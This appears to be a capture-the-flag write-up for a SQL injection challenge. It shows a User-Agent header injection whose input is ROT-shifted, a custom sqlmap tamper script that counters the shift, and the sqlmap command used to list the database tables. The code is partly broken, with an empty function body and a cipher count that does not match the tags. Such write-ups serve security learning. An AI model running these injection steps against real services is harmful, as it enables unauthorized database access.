Tags: sqli rot13 

Rating: 5.0

SQL Sanity Check
* After reading the description, the possible injectable parameters should be email or user agent. Let's test:
* It looks like email is not injectable for sure, but for user agent there is still a chance, let's test with PostMan:
* Yeah, it is injectable, we've got a SQL error, but it looks like it is doing something strange with the input. After trying few inputs, we discover that it is encrypting with ROT-11. So, we should send the payload using ROT-15 to get plain text. This looks like a job for sqlmap tampering, let's write a script:
def encrypt(letter, key):

# must be single alphabetic character
if not letter.isalpha() or len(letter) != 1:
return letter

# convert to lowercase
letter = letter.lower()

# convert to numerical value 0 - 25
# a = 0, b = 1, ... z = 25
value = ord(letter) - 97

# apply key, number of characters to shift
value = (value + key) % 26

# return encrypted letter
return chr(value + 97)

def decrypt(letter, key):

# must be single alphabetic character
if not letter.isalpha() or len(letter) != 1:
return letter

# convert to lowercase
letter = letter.lower()

# convert to numerical value 0 - 25
# a = 0, b = 1, ... z = 25
value = ord(letter) - 97

# apply key, number of characters to shift
value = (value - key) % 26

# return encrypted letter
return chr(value + 97)

# number of characters to shift

def enc(key, plaintext):
ciphertext = ''
for letter in plaintext:
ciphertext += encrypt(letter, key)
return ciphertext

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():

def tamper(payload, **kwargs):
ret = enc(15, payload)
return ret
* Let's move the script in tamper folder of sqlmap and try again:
* We got it, it's injectable. Now, let's get the tables.
python2 sqlmap.py -u "" --user-agent="sqlmap*" --method POST --data="[email protected]" --tamper=rot --tables
* It outputs a lot, but in the end, we see what we want:

Original writeup (https://github.com/JustBeYou/timctf2018finals/blob/master/sql_sanity_check.md).